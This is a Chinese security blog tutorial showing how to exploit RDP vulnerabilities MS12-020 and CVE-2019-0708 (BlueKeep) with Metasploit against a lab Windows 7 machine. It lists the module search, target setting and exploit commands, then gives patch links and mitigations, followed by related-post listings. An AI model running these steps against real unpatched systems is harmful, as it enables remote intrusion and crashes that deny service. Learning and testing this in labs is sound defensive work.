漏洞利用四:3389端口漏洞利用

最新推荐文章于 2025-06-28 00:05:49 发布
最新推荐文章于 2025-06-28 00:05:49 发布
阅读量1.8w 收藏 45
点赞数 11
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_54666999/article/details/120063620
本文详细介绍了MS12-020和CVE-2019-0708漏洞的利用过程,包括攻击步骤、配置和修复建议,同时提供了针对Windows系统安全的临时解决方案和补丁下载链接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、MS12-020

1.准备阶段

前提:靶机开放了3389端口,系统没有装补丁。

受影响Windows系统版本:

Windows7

Windows Server 2008 R2

Windows Server 2008

Windows 2003

Windows XP

因此,实验靶机选win7系统,IP:10.0.0.199。

开启靶机远程桌面;

 查看是否打过补丁:

 2.攻击步骤(依然按照经典六步)

1.进入MSF控制台:msfconsole

2.找到要利用的漏洞输入编号(search命令)

3.使用要利用的攻击项(use命令)

4.查看模块配置信息(带Yes的是需要配置的):命令:show options

查看能攻击哪些系统命令:info

5.配置(set命令):Rhosts、Lhost。

6.攻击(exploit命令):建立起会话,进入meterpreter.

use 1:存在dos攻击,会使对方系统崩溃蓝屏。

show options:

 set RHOSTS 10.0.0.199

show options确认是否配置

exploit

二、CVE-2019-0708

CVE是国际编号,2019年,0708漏洞。

攻击步骤:(经典六步)

1.进入MSF控制台:msfconsole

2.找到要利用的漏洞输入编号(search命令)

search CVE-2019-0708

3.使用要利用的攻击项(use命令)

use1

按照提示设置

4.查看模块配置信息(带Yes的是需要配置的):命令:show options

5.配置(set命令):Rhosts

set Rhosts 10.0.0.199

6.攻击(exploit命令):建立起会话,进入meterpreter.

提示未建立会话,原因是没有设置target.

排错:查看如何使用用"info"

info

set target 1

exploit

三、总结

修复方法:微软已经于2019年05月4日发布了漏洞补丁,请进行相关升级:https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EWIAC

Windows XP 及Windows 2003可以在以下链接下载补丁:https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708

临时解决方案

1、如暂时无法更新补丁,可以通过在系统上启用网络及身份认证(NLA)以暂时规避该漏洞影响。

2、在网络外围防火墙阻断TCP端口3389的连接,或对相关服务器做访问来源过滤,只允许可信IP连接。

3、禁用远程桌面服务。

3389 攻击方案
SHELLCODE_8BIT的博客
03-01 541
Rogue RDP – Revisiting Initial Access Methods - Black Hills Information Security (blackhillsinfosec.com)
MS12_020 3389远程溢出漏洞
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
10-21 237
道虽远,行则易至;儒虽难,坚为易成
3389远程桌面漏洞检测工具.zip
05-29
最新CVE-2019-0708poc ,懂得来,不懂得就别来了,360火神团队写的poc,亲测好用,用于自建,无损检测
3389漏洞批量检测工具
01-17
3389远程桌面代码执行漏洞CVE-2019-0708批量检测工具(Rdpscan Bluekeep Check)
漏洞复现:CVE-2019-0708
最新发布
2501_90131820的博客
06-28 563
摘要:本文记录了CVE-2019-0708(BlueKeep)漏洞复现过程。该漏洞存在于Windows远程桌面服务中,可导致远程代码执行。实验使用Kali(192.168.8.136)攻击未打补丁的Win7靶机(192.168.8.147)。通过nmap确认3389端口开放后,使用Metasploit的扫描模块检测漏洞存在,再切换攻击模块尝试利用。虽然最终因版本差异未成功建立会话,但完整演示了漏洞利用流程。作者在深夜完成实验后,祝愿读者暑假愉快。
利用windows 7 cve-2019-0708漏洞
ibailexiong的博客
07-01 1263
Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广如:windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。该漏洞影响旧版本的Windows系统,包括:Windows 8 和 Windows 10及之后版本不受此漏洞影响。
java_rmi漏洞利用工具
05-31
本项目使用socket直接发送数据包来攻击rmi,通过反序列化攻击rmi,双击直接运行,对1099端口的rmi服务直接进行漏洞检测。
常见端口对应的漏洞利用方式
聚鼎安全
12-14 2614
目录常见端口对应的漏洞利用方式文件共享服务端口远程连接服务端口Web应用服务端口数据库服务端口邮件服务端口网络参加协议端口特殊服务端口 常见端口对应的漏洞利用方式 端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆破/嗅探/弱口令 25 SMTP邮件服务 邮件伪造 53 DNS域名解析系统 域传送/劫持/缓存投毒/欺骗 67/68 dhcp服务 劫持
APT漏洞利用利器工具
06-27
标题中的“APT漏洞利用利器工具”指的是Advanced Persistent Threat(高级持续性威胁)的漏洞利用工具。APT通常由具有高度组织和技术能力的攻击者使用,旨在长期、秘密地侵入目标网络,窃取敏感信息或进行其他恶意...
常见端口漏洞利用方式
7Riven's blog
11-09 7045
序号 软件/服务名称 端口 类型 可能存在的漏洞/利用方式 1 Apache 80/8080 中间件 解析漏洞 目录遍历 任意文件上传 2 Apache Group ActiveMQ 8161 中间件 远程代码执行 3 Docker 2375 中...
Windows远程代码执行漏洞(CVE-2024-38077)风险公告
qcloud_security的博客
08-09 3357
近期,微软披露一个远程代码执行严重漏洞(CVE-2024-38077)。这一漏洞存在于Windows远程桌面许可管理服务(RDL)中,该服务被部署于开启了Windows远程桌面(3389端口)的服务器,用于管理远程桌面连接许可。
MS12-020(CVE-2012-0002) Exploit 3389远程溢出漏洞代码
03-09
MS12-020(CVE-2012-0002) Exploit 3389远程溢出漏洞代码
一键搞定!轻松更改远程桌面3389端口,提升安全性!
我在Citrix、VMware、Veeam、微软和NVIDIA等领域拥有丰富经验的专业人士,专注于设计和维护虚拟化基础设施、实施备份与灾难恢复策略,致力于优化企业的IT环境。
08-13 1430
一键搞定!轻松更改远程桌面3389端口,提升安全性!
3389漏洞
天才少年程序员-李荣盛专栏
11-15 1416
通过3389端口入侵    3389端口是Windows 2000 Server 远程桌面的服务端口。通过3389端口入侵系统是黑客的最爱,因为通过图形界面,可以像操作本地计算机一样来控制远程计算机。但是如何绕过系统身份验证,进入远程系统却成为了一个关键问题。本文将要提到的方法是利用经典的输入法漏洞,该漏洞存在于Microsoft Windows 2000所有中文版本,可以通过微软提供的补丁程序...
关于Windows服务器扫描3389端口漏洞处理方案(仅作参考)
weixin_45046360的博客
05-14 2112
Windows,3389,远程桌面
3389端口报SSL_TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】漏洞
你知道莽村的莽怎么来的吗!
05-13 3270
【代码】3389端口报SSL_TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】漏洞
ms12-20 远程桌面(RDP)3389漏洞
weixin_34117211的博客
07-24 3301
这是12年的漏洞了,但是还有很多系统都没打补丁,在此记录下,便于以后总结。首先列举下受影响的系统(看看你们的系统是否在里面):Windows Server 2003 Service Pack 2Windows Vista x64 Edition Service Pack 2Windows Server 2003 x64 Edition Servic...
3389端口报SSL/TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】漏洞
热门推荐
看着博客敲代码
06-04 2万+
Windows安全扫描报出3389端口漏洞,这个端口是远程桌面端口,因此也不能关闭,采用增强SSL的方式解决,解决方法如下。 一、win+R运行,输入gpedit.msc进入本地计算机策略 二、本地计算机组策略——>计算机配置——>管理模板——>网络——>ssl配置设置 三、打开ssl密码套件顺序 、点击已开启,把密码套件替换为下一步中的套件内容。 套件内容 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P521,TLS_ECDHE_RSA
3389端口+输入法漏洞”入侵经典案例
得峰的专栏 [网络收藏]
05-12 6372
本次黑客营系列选题,旨在带领大家认识一些主流技术。screen.width/2)this.style.width=screen.width/2;" border="0" alt="" />为了便于初学者研究和学习,我们为大家提供了一台服务器作为模拟攻击环境,只要你按照我们的步骤操作,就可以体验全新的黑客旅程。   为了保证本关活动的正常进行,小编真诚地希望参与者不要进行非法或损坏服务器系统的操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RootZY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值